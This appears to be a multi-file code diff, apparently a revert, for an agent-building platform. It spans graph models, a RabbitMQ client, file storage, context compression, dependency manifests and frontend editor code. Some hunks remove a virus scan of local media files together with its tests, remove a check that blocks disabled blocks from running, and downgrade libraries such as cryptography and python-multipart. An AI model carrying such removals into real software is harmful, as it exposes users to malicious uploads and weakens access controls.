@@ -924,28 +831,17 @@ class GraphModel(Graph, GraphMeta):
],
)
def hide_nodes(self) -> "GraphModelWithoutNodes":
"""
Returns a copy of the `GraphModel` with nodes, links, and sub-graphs hidden
(excluded from serialization). They are still present in the model instance
so all computed fields (e.g. `credentials_input_schema`) still work.
"""
return GraphModelWithoutNodes.model_validate(self, from_attributes=True)
class GraphMeta(Graph):
user_id: str
class GraphModelWithoutNodes(GraphModel):
"""
GraphModel variant that excludes nodes, links, and sub-graphs from serialization.
# Easy work-around to prevent exposing nodes and links in the API response
nodes: list[NodeModel] = Field(default=[], exclude=True) # type: ignore
links: list[Link] = Field(default=[], exclude=True)
Used in contexts like the store where exposing internal graph structure
is not desired. Inherits all computed fields from GraphModel but marks
nodes and links as excluded from JSON output.
"""
nodes: list[NodeModel] = Field(default_factory=list, exclude=True)
links: list[Link] = Field(default_factory=list, exclude=True)
sub_graphs: list[BaseGraph] = Field(default_factory=list, exclude=True)
@staticmethod
def from_graph(graph: GraphModel) -> "GraphMeta":
return GraphMeta(**graph.model_dump())
class GraphsPaginated(BaseModel):
@@ -1016,11 +912,21 @@ async def list_graphs_paginated(
where=where_clause,
distinct=["id"],
order={"version": "desc"},
include=AGENT_GRAPH_INCLUDE,
skip=offset,
take=page_size,
)
graph_models = [GraphMeta.from_db(graph) for graph in graphs]
graph_models: list[GraphMeta] = []
for graph in graphs:
try:
graph_meta = GraphModel.from_db(graph).meta()
# Trigger serialization to validate that the graph is well formed
graph_meta.model_dump()
graph_models.append(graph_meta)
except Exception as e:
logger.error(f"Error processing graph {graph.id}: {e}")
continue
return GraphsPaginated(
graphs=graph_models,

View File

@@ -163,6 +163,7 @@ class User(BaseModel):
if TYPE_CHECKING:
from prisma.models import User as PrismaUser
from backend.data.block import BlockSchema
T = TypeVar("T")
logger = logging.getLogger(__name__)
@@ -507,13 +508,15 @@ class CredentialsMetaInput(BaseModel, Generic[CP, CT]):
def allowed_cred_types(cls) -> tuple[CredentialsType, ...]:
return get_args(cls.model_fields["type"].annotation)
@staticmethod
def validate_credentials_field_schema(
field_schema: dict[str, Any], field_name: str
):
@classmethod
def validate_credentials_field_schema(cls, model: type["BlockSchema"]):
"""Validates the schema of a credentials input field"""
field_name = next(
name for name, type in model.get_credentials_fields().items() if type is cls
)
field_schema = model.jsonschema()["properties"][field_name]
try:
field_info = CredentialsFieldInfo[CP, CT].model_validate(field_schema)
schema_extra = CredentialsFieldInfo[CP, CT].model_validate(field_schema)
except ValidationError as e:
if "Field required [type=missing" not in str(e):
raise
@@ -523,11 +526,11 @@ class CredentialsMetaInput(BaseModel, Generic[CP, CT]):
f"{field_schema}"
) from e
providers = field_info.provider
providers = cls.allowed_providers()
if (
providers is not None
and len(providers) > 1
and not field_info.discriminator
and not schema_extra.discriminator
):
raise TypeError(
f"Multi-provider CredentialsField '{field_name}' "

View File

@@ -1,4 +1,3 @@
import asyncio
import logging
from abc import ABC, abstractmethod
from enum import Enum
@@ -226,10 +225,6 @@ class SyncRabbitMQ(RabbitMQBase):
class AsyncRabbitMQ(RabbitMQBase):
"""Asynchronous RabbitMQ client"""
def __init__(self, config: RabbitMQConfig):
super().__init__(config)
self._reconnect_lock: asyncio.Lock | None = None
@property
def is_connected(self) -> bool:
return bool(self._connection and not self._connection.is_closed)
@@ -240,17 +235,7 @@ class AsyncRabbitMQ(RabbitMQBase):
@conn_retry("AsyncRabbitMQ", "Acquiring async connection")
async def connect(self):
if self.is_connected and self._channel and not self._channel.is_closed:
return
if (
self.is_connected
and self._connection
and (self._channel is None or self._channel.is_closed)
):
self._channel = await self._connection.channel()
await self._channel.set_qos(prefetch_count=1)
await self.declare_infrastructure()
if self.is_connected:
return
self._connection = await aio_pika.connect_robust(
@@ -306,46 +291,24 @@ class AsyncRabbitMQ(RabbitMQBase):
exchange, routing_key=queue.routing_key or queue.name
)
@property
def _lock(self) -> asyncio.Lock:
if self._reconnect_lock is None:
self._reconnect_lock = asyncio.Lock()
return self._reconnect_lock
async def _ensure_channel(self) -> aio_pika.abc.AbstractChannel:
"""Get a valid channel, reconnecting if the current one is stale.
Uses a lock to prevent concurrent reconnection attempts from racing.
"""
if self.is_ready:
return self._channel # type: ignore # is_ready guarantees non-None
async with self._lock:
# Double-check after acquiring lock
if self.is_ready:
return self._channel # type: ignore
self._channel = None
await self.connect()
if self._channel is None:
raise RuntimeError("Channel should be established after connect")
return self._channel
async def _publish_once(
@func_retry
async def publish_message(
self,
routing_key: str,
message: str,
exchange: Optional[Exchange] = None,
persistent: bool = True,
) -> None:
channel = await self._ensure_channel()
if not self.is_ready:
await self.connect()
if self._channel is None:
raise RuntimeError("Channel should be established after connect")
if exchange:
exchange_obj = await channel.get_exchange(exchange.name)
exchange_obj = await self._channel.get_exchange(exchange.name)
else:
exchange_obj = channel.default_exchange
exchange_obj = self._channel.default_exchange
await exchange_obj.publish(
aio_pika.Message(
@@ -359,23 +322,9 @@ class AsyncRabbitMQ(RabbitMQBase):
routing_key=routing_key,
)
@func_retry
async def publish_message(
self,
routing_key: str,
message: str,
exchange: Optional[Exchange] = None,
persistent: bool = True,
) -> None:
try:
await self._publish_once(routing_key, message, exchange, persistent)
except aio_pika.exceptions.ChannelInvalidStateError:
logger.warning(
"RabbitMQ channel invalid, forcing reconnect and retrying publish"
)
async with self._lock:
self._channel = None
await self._publish_once(routing_key, message, exchange, persistent)
async def get_channel(self) -> aio_pika.abc.AbstractChannel:
return await self._ensure_channel()
if not self.is_ready:
await self.connect()
if self._channel is None:
raise RuntimeError("Channel should be established after connect")
return self._channel

View File

@@ -213,9 +213,6 @@ async def execute_node(
block_name=node_block.name,
)
if node_block.disabled:
raise ValueError(f"Block {node_block.id} is disabled and cannot be executed")
# Sanity check: validate the execution input.
input_data, error = validate_exec(node, data.inputs, resolve_input=False)
if input_data is None:

View File

@@ -373,7 +373,7 @@ def make_node_credentials_input_map(
# Get aggregated credentials fields for the graph
graph_cred_inputs = graph.aggregate_credentials_inputs()
for graph_input_name, (_, compatible_node_fields, _) in graph_cred_inputs.items():
for graph_input_name, (_, compatible_node_fields) in graph_cred_inputs.items():
# Best-effort map: skip missing items
if graph_input_name not in graph_credentials_input:
continue

View File

@@ -342,14 +342,6 @@ async def store_media_file(
if not target_path.is_file():
raise ValueError(f"Local file does not exist: {target_path}")
# Virus scan the local file before any further processing
local_content = target_path.read_bytes()
if len(local_content) > MAX_FILE_SIZE_BYTES:
raise ValueError(
f"File too large: {len(local_content)} bytes > {MAX_FILE_SIZE_BYTES} bytes"
)
await scan_content_safe(local_content, filename=sanitized_file)
# Return based on requested format
if return_format == "for_local_processing":
# Use when processing files locally with tools like ffmpeg, MoviePy, PIL

View File

@@ -247,100 +247,3 @@ class TestFileCloudIntegration:
execution_context=make_test_context(graph_exec_id=graph_exec_id),
return_format="for_local_processing",
)
@pytest.mark.asyncio
async def test_store_media_file_local_path_scanned(self):
"""Test that local file paths are scanned for viruses."""
graph_exec_id = "test-exec-123"
local_file = "test_video.mp4"
file_content = b"fake video content"
with patch(
"backend.util.file.get_cloud_storage_handler"
) as mock_handler_getter, patch(
"backend.util.file.scan_content_safe"
) as mock_scan, patch(
"backend.util.file.Path"
) as mock_path_class:
# Mock cloud storage handler - not a cloud path
mock_handler = MagicMock()
mock_handler.is_cloud_path.return_value = False
mock_handler_getter.return_value = mock_handler
# Mock virus scanner
mock_scan.return_value = None
# Mock file system operations
mock_base_path = MagicMock()
mock_target_path = MagicMock()
mock_resolved_path = MagicMock()
mock_path_class.return_value = mock_base_path
mock_base_path.mkdir = MagicMock()
mock_base_path.__truediv__ = MagicMock(return_value=mock_target_path)
mock_target_path.resolve.return_value = mock_resolved_path
mock_resolved_path.is_relative_to.return_value = True
mock_resolved_path.is_file.return_value = True
mock_resolved_path.read_bytes.return_value = file_content
mock_resolved_path.relative_to.return_value = Path(local_file)
mock_resolved_path.name = local_file
result = await store_media_file(
file=MediaFileType(local_file),
execution_context=make_test_context(graph_exec_id=graph_exec_id),
return_format="for_local_processing",
)
# Verify virus scan was called for local file
mock_scan.assert_called_once_with(file_content, filename=local_file)
# Result should be the relative path
assert str(result) == local_file
@pytest.mark.asyncio
async def test_store_media_file_local_path_virus_detected(self):
"""Test that infected local files raise VirusDetectedError."""
from backend.api.features.store.exceptions import VirusDetectedError
graph_exec_id = "test-exec-123"
local_file = "infected.exe"
file_content = b"malicious content"
with patch(
"backend.util.file.get_cloud_storage_handler"
) as mock_handler_getter, patch(
"backend.util.file.scan_content_safe"
) as mock_scan, patch(
"backend.util.file.Path"
) as mock_path_class:
# Mock cloud storage handler - not a cloud path
mock_handler = MagicMock()
mock_handler.is_cloud_path.return_value = False
mock_handler_getter.return_value = mock_handler
# Mock virus scanner to detect virus
mock_scan.side_effect = VirusDetectedError(
"EICAR-Test-File", "File rejected due to virus detection"
)
# Mock file system operations
mock_base_path = MagicMock()
mock_target_path = MagicMock()
mock_resolved_path = MagicMock()
mock_path_class.return_value = mock_base_path
mock_base_path.mkdir = MagicMock()
mock_base_path.__truediv__ = MagicMock(return_value=mock_target_path)
mock_target_path.resolve.return_value = mock_resolved_path
mock_resolved_path.is_relative_to.return_value = True
mock_resolved_path.is_file.return_value = True
mock_resolved_path.read_bytes.return_value = file_content
with pytest.raises(VirusDetectedError):
await store_media_file(
file=MediaFileType(local_file),
execution_context=make_test_context(graph_exec_id=graph_exec_id),
return_format="for_local_processing",
)

View File

@@ -364,44 +364,6 @@ def _remove_orphan_tool_responses(
return result
def validate_and_remove_orphan_tool_responses(
messages: list[dict],
log_warning: bool = True,
) -> list[dict]:
"""
Validate tool_call/tool_response pairs and remove orphaned responses.
Scans messages in order, tracking all tool_call IDs. Any tool response
referencing an ID not seen in a preceding message is considered orphaned
and removed. This prevents API errors like Anthropic's "unexpected tool_use_id".
Args:
messages: List of messages to validate (OpenAI or Anthropic format)
log_warning: Whether to log a warning when orphans are found
Returns:
A new list with orphaned tool responses removed
"""
available_ids: set[str] = set()
orphan_ids: set[str] = set()
for msg in messages:
available_ids |= _extract_tool_call_ids_from_message(msg)
for resp_id in _extract_tool_response_ids_from_message(msg):
if resp_id not in available_ids:
orphan_ids.add(resp_id)
if not orphan_ids:
return messages
if log_warning:
logger.warning(
f"Removing {len(orphan_ids)} orphan tool response(s): {orphan_ids}"
)
return _remove_orphan_tool_responses(messages, orphan_ids)
def _ensure_tool_pairs_intact(
recent_messages: list[dict],
all_messages: list[dict],
@@ -761,13 +723,6 @@ async def compress_context(
# Filter out any None values that may have been introduced
final_msgs: list[dict] = [m for m in msgs if m is not None]
# ---- STEP 6: Final tool-pair validation ---------------------------------
# After all compression steps, verify that every tool response has a
# matching tool_call in a preceding assistant message. Remove orphans
# to prevent API errors (e.g., Anthropic's "unexpected tool_use_id").
final_msgs = validate_and_remove_orphan_tool_responses(final_msgs)
final_count = sum(_msg_tokens(m, enc) for m in final_msgs)
error = None
if final_count + reserve > target_tokens:

File diff suppressed because it is too large Load Diff

View File

@@ -12,17 +12,16 @@ python = ">=3.10,<3.14"
aio-pika = "^9.5.5"
aiohttp = "^3.10.0"
aiodns = "^3.5.0"
anthropic = "^0.79.0"
anthropic = "^0.59.0"
apscheduler = "^3.11.1"
autogpt-libs = { path = "../autogpt_libs", develop = true }
bleach = { extras = ["css"], version = "^6.2.0" }
claude-agent-sdk = "^0.1.0"
click = "^8.2.0"
cryptography = "^46.0"
cryptography = "^45.0"
discord-py = "^2.5.2"
e2b-code-interpreter = "^1.5.2"
elevenlabs = "^1.50.0"
fastapi = "^0.128.6"
fastapi = "^0.116.1"
feedparser = "^6.0.11"
flake8 = "^7.3.0"
google-api-python-client = "^2.177.0"
@@ -35,11 +34,11 @@ html2text = "^2024.2.26"
jinja2 = "^3.1.6"
jsonref = "^1.1.0"
jsonschema = "^4.25.0"
langfuse = "^3.14.1"
launchdarkly-server-sdk = "^9.14.1"
langfuse = "^3.11.0"
launchdarkly-server-sdk = "^9.12.0"
mem0ai = "^0.1.115"
moviepy = "^2.1.2"
ollama = "^0.6.1"
ollama = "^0.5.1"
openai = "^1.97.1"
orjson = "^3.10.0"
pika = "^1.3.2"
@@ -49,16 +48,16 @@ postmarker = "^1.0"
praw = "~7.8.1"
prisma = "^0.15.0"
rank-bm25 = "^0.2.2"
prometheus-client = "^0.24.1"
prometheus-client = "^0.22.1"
prometheus-fastapi-instrumentator = "^7.0.0"
psutil = "^7.0.0"
psycopg2-binary = "^2.9.10"
pydantic = { extras = ["email"], version = "^2.12.5" }
pydantic-settings = "^2.12.0"
pydantic = { extras = ["email"], version = "^2.11.7" }
pydantic-settings = "^2.10.1"
pytest = "^8.4.1"
pytest-asyncio = "^1.1.0"
python-dotenv = "^1.1.1"
python-multipart = "^0.0.22"
python-multipart = "^0.0.20"
redis = "^6.2.0"
regex = "^2025.9.18"
replicate = "^1.0.6"
@@ -66,19 +65,19 @@ sentry-sdk = {extras = ["anthropic", "fastapi", "launchdarkly", "openai", "sqlal
sqlalchemy = "^2.0.40"
strenum = "^0.4.9"
stripe = "^11.5.0"
supabase = "2.27.3"
tenacity = "^9.1.4"
supabase = "2.17.0"
tenacity = "^9.1.2"
todoist-api-python = "^2.1.7"
tweepy = "^4.16.0"
uvicorn = { extras = ["standard"], version = "^0.40.0" }
uvicorn = { extras = ["standard"], version = "^0.35.0" }
websockets = "^15.0"
youtube-transcript-api = "^1.2.1"
yt-dlp = "2025.12.08"
zerobouncesdk = "^1.1.2"
# NOTE: please insert new dependencies in their alphabetical location
pytest-snapshot = "^0.9.0"
aiofiles = "^25.1.0"
tiktoken = "^0.12.0"
aiofiles = "^24.1.0"
tiktoken = "^0.9.0"
aioclamd = "^1.0.0"
setuptools = "^80.9.0"
gcloud-aio-storage = "^9.5.0"
@@ -96,13 +95,13 @@ black = "^24.10.0"
faker = "^38.2.0"
httpx = "^0.28.1"
isort = "^5.13.2"
poethepoet = "^0.41.0"
poethepoet = "^0.37.0"
pre-commit = "^4.4.0"
pyright = "^1.1.407"
pytest-mock = "^3.15.1"
pytest-watcher = "^0.6.3"
pytest-watcher = "^0.4.2"
requests = "^2.32.5"
ruff = "^0.15.0"
ruff = "^0.14.5"
# NOTE: please insert new dependencies in their alphabetical location
[build-system]

View File

@@ -3,6 +3,7 @@
"credentials_input_schema": {
"properties": {},
"required": [],
"title": "TestGraphCredentialsInputSchema",
"type": "object"
},
"description": "A test graph",

View File

@@ -1,14 +1,34 @@
[
{
"created_at": "2025-09-04T13:37:00",
"credentials_input_schema": {
"properties": {},
"required": [],
"title": "TestGraphCredentialsInputSchema",
"type": "object"
},
"description": "A test graph",
"forked_from_id": null,
"forked_from_version": null,
"has_external_trigger": false,
"has_human_in_the_loop": false,
"has_sensitive_action": false,
"id": "graph-123",
"input_schema": {
"properties": {},
"required": [],
"type": "object"
},
"instructions": null,
"is_active": true,
"name": "Test Graph",
"output_schema": {
"properties": {},
"required": [],
"type": "object"
},
"recommended_schedule_cron": null,
"sub_graphs": [],
"trigger_setup_info": null,
"user_id": "3e53486c-cf57-477e-ba2a-cb02dc828e1a",
"version": 1
}

View File

@@ -25,12 +25,8 @@ RUN if [ -f .env.production ]; then \
cp .env.default .env; \
fi
RUN pnpm run generate:api
# Disable source-map generation in Docker builds to halve webpack memory usage.
# Source maps are only useful when SENTRY_AUTH_TOKEN is set (Vercel deploys);
# the Docker image never uploads them, so generating them just wastes RAM.
ENV NEXT_PUBLIC_SOURCEMAPS="false"
# In CI, we want NEXT_PUBLIC_PW_TEST=true during build so Next.js inlines it
RUN if [ "$NEXT_PUBLIC_PW_TEST" = "true" ]; then NEXT_PUBLIC_PW_TEST=true NODE_OPTIONS="--max-old-space-size=8192" pnpm build; else NODE_OPTIONS="--max-old-space-size=8192" pnpm build; fi
RUN if [ "$NEXT_PUBLIC_PW_TEST" = "true" ]; then NEXT_PUBLIC_PW_TEST=true NODE_OPTIONS="--max-old-space-size=4096" pnpm build; else NODE_OPTIONS="--max-old-space-size=4096" pnpm build; fi
# Prod stage - based on NextJS reference Dockerfile https://github.com/vercel/next.js/blob/64271354533ed16da51be5dce85f0dbd15f17517/examples/with-docker/Dockerfile
FROM node:21-alpine AS prod

View File

@@ -1,12 +1,8 @@
import { withSentryConfig } from "@sentry/nextjs";
// Allow Docker builds to skip source-map generation (halves memory usage).
// Defaults to true so Vercel/local builds are unaffected.
const enableSourceMaps = process.env.NEXT_PUBLIC_SOURCEMAPS !== "false";
/** @type {import('next').NextConfig} */
const nextConfig = {
productionBrowserSourceMaps: enableSourceMaps,
productionBrowserSourceMaps: true,
// Externalize OpenTelemetry packages to fix Turbopack HMR issues
serverExternalPackages: [
"@opentelemetry/instrumentation",
@@ -18,37 +14,9 @@ const nextConfig = {
serverActions: {
bodySizeLimit: "256mb",
},
// Increase body size limit for API routes (file uploads) - 256MB to match backend limit
proxyClientMaxBodySize: "256mb",
middlewareClientMaxBodySize: "256mb",
// Limit parallel webpack workers to reduce peak memory during builds.
cpus: 2,
},
// Work around cssnano "Invalid array length" bug in Next.js's bundled
// cssnano-simple comment parser when processing very large CSS chunks.
// CSS is still bundled correctly; gzip handles most of the size savings anyway.
webpack: (config, { dev }) => {
if (!dev) {
// Next.js adds CssMinimizerPlugin internally (after user config), so we
// can't filter it from config.plugins. Instead, intercept the webpack
// compilation hooks and replace the buggy plugin's tap with a no-op.
config.plugins.push({
apply(compiler) {
compiler.hooks.compilation.tap(
"DisableCssMinimizer",
(compilation) => {
compilation.hooks.processAssets.intercept({
register: (tap) => {
if (tap.name === "CssMinimizerPlugin") {
return { ...tap, fn: async () => {} };
}
return tap;
},
});
},
);
},
});
}
return config;
},
images: {
domains: [
@@ -86,16 +54,9 @@ const nextConfig = {
transpilePackages: ["geist"],
};
// Only run the Sentry webpack plugin when we can actually upload source maps
// (i.e. on Vercel with SENTRY_AUTH_TOKEN set). The Sentry *runtime* SDK
// (imported in app code) still captures errors without the plugin.
// Skipping the plugin saves ~1 GB of peak memory during `next build`.
const skipSentryPlugin =
process.env.NODE_ENV !== "production" ||
!enableSourceMaps ||
!process.env.SENTRY_AUTH_TOKEN;
const isDevelopmentBuild = process.env.NODE_ENV !== "production";
export default skipSentryPlugin
export default isDevelopmentBuild
? nextConfig
: withSentryConfig(nextConfig, {
// For all available options, see:
@@ -135,7 +96,7 @@ export default skipSentryPlugin
// This helps Sentry with sourcemaps... https://docs.sentry.io/platforms/javascript/guides/nextjs/sourcemaps/
sourcemaps: {
disable: !enableSourceMaps,
disable: false,
assets: [".next/**/*.js", ".next/**/*.js.map"],
ignore: ["**/node_modules/**"],
deleteSourcemapsAfterUpload: false, // Source is public anyway :)

View File

@@ -7,7 +7,7 @@
},
"scripts": {
"dev": "pnpm run generate:api:force && next dev --turbo",
"build": "cross-env NODE_OPTIONS=--max-old-space-size=16384 next build",
"build": "next build",
"start": "next start",
"start:standalone": "cd .next/standalone && node server.js",
"lint": "next lint && prettier --check .",
@@ -30,7 +30,6 @@
"defaults"
],
"dependencies": {
"@ai-sdk/react": "3.0.61",
"@faker-js/faker": "10.0.0",
"@hookform/resolvers": "5.2.2",
"@next/third-parties": "15.4.6",
@@ -61,10 +60,6 @@
"@rjsf/utils": "6.1.2",
"@rjsf/validator-ajv8": "6.1.2",
"@sentry/nextjs": "10.27.0",
"@streamdown/cjk": "1.0.1",
"@streamdown/code": "1.0.1",
"@streamdown/math": "1.0.1",
"@streamdown/mermaid": "1.0.1",
"@supabase/ssr": "0.7.0",
"@supabase/supabase-js": "2.78.0",
"@tanstack/react-query": "5.90.6",
@@ -73,7 +68,6 @@
"@vercel/analytics": "1.5.0",
"@vercel/speed-insights": "1.2.0",
"@xyflow/react": "12.9.2",
"ai": "6.0.59",
"boring-avatars": "1.11.2",
"class-variance-authority": "0.7.1",
"clsx": "2.1.1",
@@ -93,6 +87,7 @@
"launchdarkly-react-client-sdk": "3.9.0",
"lodash": "4.17.21",
"lucide-react": "0.552.0",
"moment": "2.30.1",
"next": "15.4.10",
"next-themes": "0.4.6",
"nuqs": "2.7.2",
@@ -107,7 +102,7 @@
"react-markdown": "9.0.3",
"react-modal": "3.16.3",
"react-shepherd": "6.1.9",
"react-window": "2.2.0",
"react-window": "1.8.11",
"recharts": "3.3.0",
"rehype-autolink-headings": "7.1.0",
"rehype-highlight": "7.0.2",
@@ -117,11 +112,9 @@
"remark-math": "6.0.0",
"shepherd.js": "14.5.1",
"sonner": "2.0.7",
"streamdown": "2.1.0",
"tailwind-merge": "2.6.0",
"tailwind-scrollbar": "3.1.0",
"tailwindcss-animate": "1.0.7",
"use-stick-to-bottom": "1.1.2",
"uuid": "11.1.0",
"vaul": "1.1.2",
"zod": "3.25.76",
@@ -147,7 +140,7 @@
"@types/react": "18.3.17",
"@types/react-dom": "18.3.5",
"@types/react-modal": "3.16.3",
"@types/react-window": "2.0.0",
"@types/react-window": "1.8.8",
"@vitejs/plugin-react": "5.1.2",
"axe-playwright": "2.2.2",
"chromatic": "13.3.3",
@@ -179,8 +172,7 @@
},
"pnpm": {
"overrides": {
"@opentelemetry/instrumentation": "0.209.0",
"lodash-es": "4.17.23"
"@opentelemetry/instrumentation": "0.209.0"
}
},
"packageManager": "pnpm@10.20.0+sha512.cf9998222162dd85864d0a8102e7892e7ba4ceadebbf5a31f9c2fce48dfce317a9c53b9f6464d1ef9042cba2e02ae02a9f7c143a2b438cd93c91840f0192b9dd"

File diff suppressed because it is too large Load Diff

View File

@@ -1,5 +1,5 @@
import { CredentialsMetaInput } from "@/app/api/__generated__/models/credentialsMetaInput";
import { GraphModel } from "@/app/api/__generated__/models/graphModel";
import { GraphMeta } from "@/app/api/__generated__/models/graphMeta";
import { CredentialsInput } from "@/components/contextual/CredentialsInput/CredentialsInput";
import { useState } from "react";
import { getSchemaDefaultCredentials } from "../../helpers";
@@ -9,7 +9,7 @@ type Credential = CredentialsMetaInput | undefined;
type Credentials = Record<string, Credential>;
type Props = {
agent: GraphModel | null;
agent: GraphMeta | null;
siblingInputs?: Record<string, any>;
onCredentialsChange: (
credentials: Record<string, CredentialsMetaInput>,

View File

@@ -1,9 +1,9 @@
import { CredentialsMetaInput } from "@/app/api/__generated__/models/credentialsMetaInput";
import { GraphModel } from "@/app/api/__generated__/models/graphModel";
import { GraphMeta } from "@/app/api/__generated__/models/graphMeta";
import { BlockIOCredentialsSubSchema } from "@/lib/autogpt-server-api/types";
export function getCredentialFields(
agent: GraphModel | null,
agent: GraphMeta | null,
): AgentCredentialsFields {
if (!agent) return {};

View File

@@ -3,10 +3,10 @@ import type {
CredentialsMetaInput,
} from "@/lib/autogpt-server-api/types";
import type { InputValues } from "./types";
import { GraphModel } from "@/app/api/__generated__/models/graphModel";
import { GraphMeta } from "@/app/api/__generated__/models/graphMeta";
export function computeInitialAgentInputs(
agent: GraphModel | null,
agent: GraphMeta | null,
existingInputs?: InputValues | null,
): InputValues {
const properties = agent?.input_schema?.properties || {};
@@ -29,7 +29,7 @@ export function computeInitialAgentInputs(
}
type IsRunDisabledParams = {
agent: GraphModel | null;
agent: GraphMeta | null;
isRunning: boolean;
agentInputs: InputValues | null | undefined;
};

View File

@@ -1,4 +1,4 @@
import debounce from "lodash/debounce";
import { debounce } from "lodash";
import { useCallback, useEffect, useRef, useState } from "react";
import { useBlockMenuStore } from "../../../../stores/blockMenuStore";
import { getQueryClient } from "@/lib/react-query/queryClient";

View File

@@ -70,10 +70,10 @@ export const HorizontalScroll: React.FC<HorizontalScrollAreaProps> = ({
{children}
</div>
{canScrollLeft && (
<div className="pointer-events-none absolute inset-y-0 left-0 w-8 bg-gradient-to-r from-background via-background/80 to-background/0" />
<div className="pointer-events-none absolute inset-y-0 left-0 w-8 bg-gradient-to-r from-white via-white/80 to-white/0" />
)}
{canScrollRight && (
<div className="pointer-events-none absolute inset-y-0 right-0 w-8 bg-gradient-to-l from-background via-background/80 to-background/0" />
<div className="pointer-events-none absolute inset-y-0 right-0 w-8 bg-gradient-to-l from-white via-white/80 to-white/0" />
)}
{canScrollLeft && (
<button

View File

@@ -30,8 +30,6 @@ import {
} from "@/components/atoms/Tooltip/BaseTooltip";
import { GraphMeta } from "@/lib/autogpt-server-api";
import jaro from "jaro-winkler";
import { getV1GetSpecificGraph } from "@/app/api/__generated__/endpoints/graphs/graphs";
import { okData } from "@/app/api/helpers";
type _Block = Omit<Block, "inputSchema" | "outputSchema"> & {
uiKey?: string;
@@ -109,8 +107,6 @@ export function BlocksControl({
.filter((b) => b.uiType !== BlockUIType.AGENT)
.sort((a, b) => a.name.localeCompare(b.name));
// Agent blocks are created from GraphMeta which doesn't include schemas.
// Schemas will be fetched on-demand when the block is actually added.
const agentBlockList = flows
.map((flow): _Block => {
return {
@@ -120,9 +116,8 @@ export function BlocksControl({
`Ver.${flow.version}` +
(flow.description ? ` | ${flow.description}` : ""),
categories: [{ category: "AGENT", description: "" }],
// Empty schemas - will be populated when block is added
inputSchema: { type: "object", properties: {} },
outputSchema: { type: "object", properties: {} },
inputSchema: flow.input_schema,
outputSchema: flow.output_schema,
staticOutput: false,
uiType: BlockUIType.AGENT,
costs: [],
@@ -130,7 +125,8 @@ export function BlocksControl({
hardcodedValues: {
graph_id: flow.id,
graph_version: flow.version,
// Schemas will be fetched on-demand when block is added
input_schema: flow.input_schema,
output_schema: flow.output_schema,
},
};
})
@@ -186,37 +182,6 @@ export function BlocksControl({
setSelectedCategory(null);
}, []);
// Handler to add a block, fetching graph data on-demand for agent blocks
const handleAddBlock = useCallback(
async (block: _Block & { notAvailable: string | null }) => {
if (block.notAvailable) return;
// For agent blocks, fetch the full graph to get schemas
if (block.uiType === BlockUIType.AGENT && block.hardcodedValues) {
const graphID = block.hardcodedValues.graph_id as string;
const graphVersion = block.hardcodedValues.graph_version as number;
const graphData = okData(
await getV1GetSpecificGraph(graphID, { version: graphVersion }),
);
if (graphData) {
addBlock(block.id, block.name, {
...block.hardcodedValues,
input_schema: graphData.input_schema,
output_schema: graphData.output_schema,
});
} else {
// Fallback: add without schemas (will be incomplete)
console.error("Failed to fetch graph data for agent block");
addBlock(block.id, block.name, block.hardcodedValues || {});
}
} else {
addBlock(block.id, block.name, block.hardcodedValues || {});
}
},
[addBlock],
);
// Extract unique categories from blocks
const categories = useMemo(() => {
return Array.from(
@@ -338,7 +303,10 @@ export function BlocksControl({
}),
);
}}
onClick={() => handleAddBlock(block)}
onClick={() =>
!block.notAvailable &&
addBlock(block.id, block.name, block?.hardcodedValues || {})
}
title={block.notAvailable ?? undefined}
>
<div

View File

@@ -29,17 +29,13 @@ import "@xyflow/react/dist/style.css";
import { ConnectedEdge, CustomNode } from "../CustomNode/CustomNode";
import "./flow.css";
import {
BlockIORootSchema,
BlockUIType,
formatEdgeID,
GraphExecutionID,
GraphID,
GraphMeta,
LibraryAgent,
SpecialBlockID,
} from "@/lib/autogpt-server-api";
import { getV1GetSpecificGraph } from "@/app/api/__generated__/endpoints/graphs/graphs";
import { okData } from "@/app/api/helpers";
import { IncompatibilityInfo } from "../../../hooks/useSubAgentUpdate/types";
import { Key, storage } from "@/services/storage/local-storage";
import { findNewlyAddedBlockCoordinates, getTypeColor } from "@/lib/utils";
@@ -691,94 +687,8 @@ const FlowEditor: React.FC<{
[getNode, updateNode, nodes],
);
/* Shared helper to create and add a node */
const createAndAddNode = useCallback(
async (
blockID: string,
blockName: string,
hardcodedValues: Record<string, any>,
position: { x: number; y: number },
): Promise<CustomNode | null> => {
const nodeSchema = availableBlocks.find((node) => node.id === blockID);
if (!nodeSchema) {
console.error(`Schema not found for block ID: ${blockID}`);
return null;
}
// For agent blocks, fetch the full graph to get schemas
let inputSchema: BlockIORootSchema = nodeSchema.inputSchema;
let outputSchema: BlockIORootSchema = nodeSchema.outputSchema;
let finalHardcodedValues = hardcodedValues;
if (blockID === SpecialBlockID.AGENT) {
const graphID = hardcodedValues.graph_id as string;
const graphVersion = hardcodedValues.graph_version as number;
const graphData = okData(
await getV1GetSpecificGraph(graphID, { version: graphVersion }),
);
if (graphData) {
inputSchema = graphData.input_schema as BlockIORootSchema;
outputSchema = graphData.output_schema as BlockIORootSchema;
finalHardcodedValues = {
...hardcodedValues,
input_schema: graphData.input_schema,
output_schema: graphData.output_schema,
};
} else {
console.error("Failed to fetch graph data for agent block");
}
}
const newNode: CustomNode = {
id: nodeId.toString(),
type: "custom",
position,
data: {
blockType: blockName,
blockCosts: nodeSchema.costs || [],
title: `${blockName} ${nodeId}`,
description: nodeSchema.description,
categories: nodeSchema.categories,
inputSchema: inputSchema,
outputSchema: outputSchema,
hardcodedValues: finalHardcodedValues,
connections: [],
isOutputOpen: false,
block_id: blockID,
isOutputStatic: nodeSchema.staticOutput,
uiType: nodeSchema.uiType,
},
};
addNodes(newNode);
setNodeId((prevId) => prevId + 1);
clearNodesStatusAndOutput();
history.push({
type: "ADD_NODE",
payload: { node: { ...newNode, ...newNode.data } },
undo: () => deleteElements({ nodes: [{ id: newNode.id }] }),
redo: () => addNodes(newNode),
});
return newNode;
},
[
availableBlocks,
nodeId,
addNodes,
deleteElements,
clearNodesStatusAndOutput,
],
);
const addNode = useCallback(
async (
blockId: string,
nodeType: string,
hardcodedValues: Record<string, any> = {},
) => {
(blockId: string, nodeType: string, hardcodedValues: any = {}) => {
const nodeSchema = availableBlocks.find((node) => node.id === blockId);
if (!nodeSchema) {
console.error(`Schema not found for block ID: ${blockId}`);
@@ -797,42 +707,73 @@ const FlowEditor: React.FC<{
// Alternative: We could also use D3 force, Intersection for this (React flow Pro examples)
const { x, y } = getViewport();
const position =
const viewportCoordinates =
nodeDimensions && Object.keys(nodeDimensions).length > 0
? findNewlyAddedBlockCoordinates(
? // we will get all the dimension of nodes, then store
findNewlyAddedBlockCoordinates(
nodeDimensions,
